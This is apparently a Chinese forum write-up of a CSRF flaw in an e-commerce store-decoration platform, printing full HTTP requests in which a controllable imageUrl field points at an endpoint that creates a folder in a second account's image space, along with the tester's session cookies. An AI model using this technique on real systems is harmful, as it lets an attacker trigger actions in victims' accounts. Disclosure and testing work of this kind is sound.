|
某东某系统存在 CSRF 漏洞。
A 账号:
微信小程序-图片链接 url 可控:
- POST /decoration/api/element/saveAndPublish HTTP/2
- Host: xx.cn
- Cookie: __jdv=113905493|goselling.com|-|referral|-|1685667852704;
- 3AB9D23F7A4B3C9B=FIH6HCA4K25HNQKDQDC2TQWRTECH5S2VIAB3N47EMB3BAXCGEVY7EX63
- PWYRXD6YOH4CG2GUYFJB7HA4RMUMWTOFT4;
- mfs_lsy_sessionb=1B57ACBC44805946A768BDBBE22E6827;
- mfs_lsy_pinb=lsy_38wYlgG2xqj2srM2Kj; tenantCode=selling2;
- sp_lsy_session=C9CA7D12DC574BE689C704C5A4259027; sp_lsy_vd=13681143;
- hi_belong=Z2YDMOOJEL6N27HUO6OS54X2SQUY5BKOKCPUGSDZPCGKLWF3KGQIO2POUGEAI7KX
- TBSARQ253EX3EPC4KSBVGV3B2QOHNPTA3YSQXT5W5M5IOLYA4ND62HTND5BWQR73DT43COTL
- HBJEJL26FYG3BNTSOXO23LDO7Q5LKC7ZJQ4XNYRXKODNH5PKLTBXTNUL2IT6EAVFQPYNKAT4LXA
- GJEFQLSNG5HGVY6QRGQY; app_code=FEA37492D92D78FAC0C0AC66BEC37C39; shop_type=0;
- mfs_user_role=1; mba_muid=1685667852703344777662; navigation=[%22*sl_RrFdTHe%22];
- mba_sid=16856679524822945543355525546.19; __jda=216326275.1685667852703344777662.1685667853.1685667853.1685667853.1; __jdb=216326275.23.1685667852703344777662|1.1685667853; __jdc=216326275;
- themeId=18595
- Content-Length: 8315
- Sgm-Context: 213108912045568420;213108912045568420
- Sec-Ch-Ua: "Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24" Sec-Ch-Ua-Mobile: ?0
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
- Gecko) Chrome/113.0.0.0 Safari/537.36
- Content-Type: application/json
- Accept: application/json, text/plain, */* X-Requested-With: XMLHttpRequest
- Sec-Ch-Ua-Platform: "macOS" Origin: https://xx.cn
- Sec-Fetch-Site: same-origin
- Sec-Fetch-Mode: cors
- Sec-Fetch-Dest: empty
- Referer: https://xx.cn/?elementId=144153&scope=1&hideMiddlePage=false
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.9
- {"channel":1,"platform":2,"source":1,"traceId":"DESIGN_ezdlul3v","scope":"1","elementType":nu
- ll,"floorList":[{"version":"1.0.0","componentPubId":7,"elementId":144153,"floorId":"283125"},{"v
- ersion":"1.0.0","componentPubId":8,"elementId":144153,"floorId":"283126"},{"version":"1.0.0", "componentPubId":4,"elementId":144153,"content":"{"searchText":" 请 输 入 搜 索 关 键 词
- ","bgColor":"#ffffff","textColor":"#999999","searchColor":"#f4f4f4"}","floorId":"2831
- 23"},{"version":"1.0.0","componentPubId":2,"elementId":144153,"content":"{"imageUrl":"htt
- ps://upload-shop.selling.cn/api/imgcategory/doAdd?parentCateId=0&cateName=csrf-test&key=\ ","hotList":[],"editorImageHeight":3457,"imageHeight":"526.13"}","floorId":"283122"},{"v
- ersion":"1.0.0","componentPubId":2,"elementId":144153,"content":"{"imageUrl":"//img14.36
- 0buyimg.com/saasdecoration/jfs/t1/172081/30/11498/2409/60ae5dd2E06701229/17e3bcd8eae
- 06c94.png","hotList":[],"editorImageHeight":180,"imageHeight":"60.00"}","floorId":"283
- 124"},{"version":"1.0.0","componentPubId":3,"elementId":144153,"content":"{"colNumber":3, "backgroundColor":"#f4f4f4","productDetailType":1,"sl-skus":{"type":"auto","produc
- tNum":6,"list":[],"listResult":[{"skuId":601899904,"skuName":"测试商品 3(系统自动
- 创 建 , 可 供 体 验 全 流 程 )
- ","originPrice":null,"realPrice":1,"productId":null,"skuStatus":"1","stockStatus":"33\ ","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jpg"
- ,"productName":" 测 试 商 品 3 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\ "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
- ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":601899928,"
- skuName":" 测 试 商 品 2 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":" 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
- g","productName":" 测 试 商 品 2 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\ "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
- ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":604975005,"
- skuName":" 测 试 商 品 1 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":" 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
- g","productName":" 测 试 商 品 1 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\ "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
- ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":601899906,"
- skuName":" 测 试 商 品 5 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":" 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
- g","productName":" 测 试 商 品 5 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\ "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
- ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":604975003,"
- skuName":" 测 试 商 品 4 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- ","originPrice":null,"realPrice":2,"productId":null,"skuStatus":"1","stockStatus":"33\ ","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jpg"
- ,"productName":" 测 试 商 品 4 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\ "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
- ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":601899930,"
- skuName":" 测 试 商 品 6 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- \\">","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus
- ":"33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37ba
- b8.jpg","productName":" 测 试 商 品 6 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- \\">","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":
- null,"purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels\ ":"[]","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null}]}}","floorId":"28311
- 9"},{"version":"1.0.0","componentPubId":2,"elementId":144153,"content":"{"imageUrl":"//im
- g14.360buyimg.com/saasdecoration/jfs/t1/127293/32/19284/3437/60ae5e0cEe3a32a72/1b07afaa63f15aaf.png","hotList":[],"editorImageHeight":180,"imageHeight":"60.00"}","floorId"
- :"283121"},{"version":"1.0.0","componentPubId":3,"elementId":144153,"content":"{"colNumbe
- r":2,"backgroundColor":"#f4f4f4","productDetailType":1,"sl-skus":{"type":"auto","p
- roductNum":4,"list":[],"listResult":[{"skuId":601899904,"skuName":"测试商品 3(系统
- 自 动 创 建 , 可 供 体 验 全 流 程 )
- ","originPrice":null,"realPrice":1,"productId":null,"skuStatus":"1","stockStatus":"33\
-
- ","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jpg"
- ,"productName":" 测 试 商 品 3 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\
-
- "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
- ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":601899928,"
- skuName":" 测 试 商 品 2 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":"
-
- 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
- g","productName":" 测 试 商 品 2 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\
-
- "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
- ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":604975005,"
- skuName":" 测 试 商 品 1 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":"
-
- 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
- g","productName":" 测 试 商 品 1 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\
-
- "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
- ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":601899906,"
- skuName":" 测 试 商 品 5 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":"
-
- 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
- g","productName":" 测 试 商 品 5 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
- ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\
-
- "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
- ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null}]}}","floorId":"283120"}],"
-
- pageConfig":{"componentPubId":9,"version":"1.0.0","elementId":144153,"type":"1","content":"{
- "titleText":" 好 物 旗 舰 店
- ","isMessage":1,"isShare":1,"isShopInfo":1,"validated":true,"isAppShopNav":2}"},"ele
- mentId":144153,"needPublish":1}
复制代码
数据包
content 参数里 imageUrl 可控
该 url,为图片空间中新建文件夹 csrf-poc
csrf-poc 数据包:
- GET /api/imgcategory/doAdd?parentCateId=0&cateName=csrf-test&key= HTTP/2
- Host: xx.cn
- Cookie: __jdv=113905493|goselling.com|-|referral|-|1685667852704;
- 3AB9D23F7A4B3C9B=FIH6HCA4K25HNQKDQDC2TQWRTECH5S2VIAB3N47EMB3BAXCGEVY7EX63
- PWYRXD6YOH4CG2GUYFJB7HA4RMUMWTOFT4;
- mfs_lsy_sessionb=1B57ACBC44805946A768BDBBE22E6827;
- mfs_lsy_pinb=lsy_38wYlgG2xqj2srM2Kj; tenantCode=selling2;
- sp_lsy_session=C9CA7D12DC574BE689C704C5A4259027; sp_lsy_vd=13681143;
- hi_belong=Z2YDMOOJEL6N27HUO6OS54X2SQUY5BKOKCPUGSDZPCGKLWF3KGQIO2POUGEAI7KX
- TBSARQ253EX3EPC4KSBVGV3B2QOHNPTA3YSQXT5W5M5IOLYA4ND62HTND5BWQR73DT43COTL
- HBJEJL26FYG3BNTSOXO23LDO7Q5LKC7ZJQ4XNYRXKODNH5PKLTBXTNUL2IT6EAVFQPYNKAT4LXA
- GJEFQLSNG5HGVY6QRGQY; app_code=FEA37492D92D78FAC0C0AC66BEC37C39; shop_type=0;
- mfs_user_role=1; mba_muid=1685667852703344777662; navigation=[%22*sl_RrFdTHe%22];
- themeId=18595; mba_sid=16856679524822945543355525546.42; __jda=178808869.1685667852703344777662.1685667853.1685667853.1685667853.1; __jdc=178808869; __jdb=178808869.29.1685667852703344777662|1.1685667853
- Sec-Ch-Ua: "Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24" Accept: application/json, text/javascript, */*; q=0.01
- Sec-Ch-Ua-Mobile: ?0
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
- Gecko) Chrome/113.0.0.0 Safari/537.36
- Sec-Ch-Ua-Platform: "macOS" Origin: https://xx.cn
- Sec-Fetch-Site: same-site
- Sec-Fetch-Mode: cors
- Sec-Fetch-Dest: empty
- Referer: https://xx.cn/
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.9
复制代码
复制链接,b 账号访问
再去看看 b 账号图片管理中是否多了一个 csrf-test 文件夹。如果有则存在该漏洞。
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|